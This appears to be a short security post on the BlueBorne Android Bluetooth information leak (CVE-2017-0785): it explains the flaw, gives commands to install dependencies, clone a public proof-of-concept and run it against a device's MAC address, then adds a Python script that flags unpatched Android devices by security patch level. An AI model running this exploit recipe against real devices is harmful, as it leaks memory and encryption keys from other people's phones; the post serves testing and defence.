CVE-2017-0785: BlueBorne PoC
Information Leak Vulnerability (CVE-2017-0785)
The first vulnerability in the Android operating system reveals valuable information which helps the attacker leverage one of the remote code execution vulnerabilities described below. The vulnerability was found in the SDP (Service Discovery Protocol) server, which enables the device to identify other Bluetooth services around it. The flaw allows the attacker to send a set of crafted requests to the server, causing it to disclose memory bits in response. These pieces of information can later be used by the attacker to overcome advanced security measures and take control over the device. This vulnerability can also allow an attacker to leak encryption keys from the targeted device and eavesdrop on Bluetooth communications, in an attack that very much resembles Heartbleed.
Just ran a quick BlueBorne (https://github.com/ojasookert/CVE-2017-0785) PoC test against an Android 4.4 smartphone.
# Bluetooth stack and development headers (Debian/Ubuntu)
sudo apt-get install bluetooth libbluetooth-dev
# Python Bluetooth bindings and pwntools, the PoC's two dependencies
sudo pip install pybluez
sudo pip install pwntools
# Fetch the PoC and run it from inside the cloned directory
git clone https://github.com/ojasookert/CVE-2017-0785.git
cd CVE-2017-0785
# TARGET is the Bluetooth MAC address of the test device, passed as a pwntools-style argument
python CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX
The stack gets dumped.
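Before running a PoC like the one above, the check a practitioner usually wants is whether a device is still exposed at all. The following is an added example, not code from the original post or from the CVE-2017-0785 repository. It assumes the BlueBorne fixes shipped in the September 2017 Android security bulletin, so a security patch level of 2017-09-05 or later is treated as patched; the getprop output it parses is constructed inline. Builds that predate the ro.build.version.security_patch property (such as the Android 4.4 device tested above) report nothing and are treated as vulnerable.

```python
import re
from datetime import date
from typing import Optional, Tuple

# Android security patch level carrying the BlueBorne fixes (September 2017 bulletin).
# Assumed threshold for this example; adjust if your vendor backported the fix differently.
BLUEBORNE_PATCH_LEVEL = date(2017, 9, 5)

PROP_NAME = "ro.build.version.security_patch"
_DATE_RE = re.compile(r"(\d{4})-(\d{2})-(\d{2})")


def parse_patch_level(getprop_output: str) -> Optional[date]:
    """Extract the security patch level from `adb shell getprop` output.

    Accepts both the full listing form  "[ro.build.version.security_patch]: [2017-08-05]"
    and the bare value printed by  "getprop ro.build.version.security_patch".
    Returns None when the property is absent (older releases do not define it).
    """
    lines = [ln.strip() for ln in getprop_output.splitlines() if ln.strip()]
    for ln in lines:
        if PROP_NAME in ln:
            m = _DATE_RE.search(ln)
            if m:
                return date(*map(int, m.groups()))
            return None  # property present but empty/unparseable
    # Bare-value form: exactly one line that is just a date
    if len(lines) == 1 and _DATE_RE.fullmatch(lines[0]):
        return date(*map(int, _DATE_RE.fullmatch(lines[0]).groups()))
    return None


def assess_blueborne_exposure(getprop_output: str) -> Tuple[str, Optional[date]]:
    """Classify a device as 'patched', 'vulnerable' or 'unknown' for CVE-2017-0785.

    'unknown' (no patch level reported) is deliberately treated as vulnerable by
    callers: a build too old to carry the property also predates the fix.
    """
    level = parse_patch_level(getprop_output)
    if level is None:
        return "unknown", None
    if level < BLUEBORNE_PATCH_LEVEL:
        return "vulnerable", level
    return "patched", level


if __name__ == "__main__":
    # Constructed getprop outputs standing in for three devices (not real captures).
    samples = {
        "android-4.4 (no property)": "[ro.build.version.release]: [4.4.2]\n",
        "android-7.0 unpatched": "[ro.build.version.release]: [7.0]\n"
                                 "[ro.build.version.security_patch]: [2017-08-05]\n",
        "android-8.0 patched": "2017-10-05\n",
    }
    for name, out in samples.items():
        status, level = assess_blueborne_exposure(out)
        print(f"{name:28s} -> {status:10s} (patch level: {level})")
```

Feed it the output of `adb shell getprop` (or of `adb shell getprop ro.build.version.security_patch`) for each device in your inventory; anything that comes back as "unknown" or "vulnerable" should have Bluetooth disabled until it can be updated.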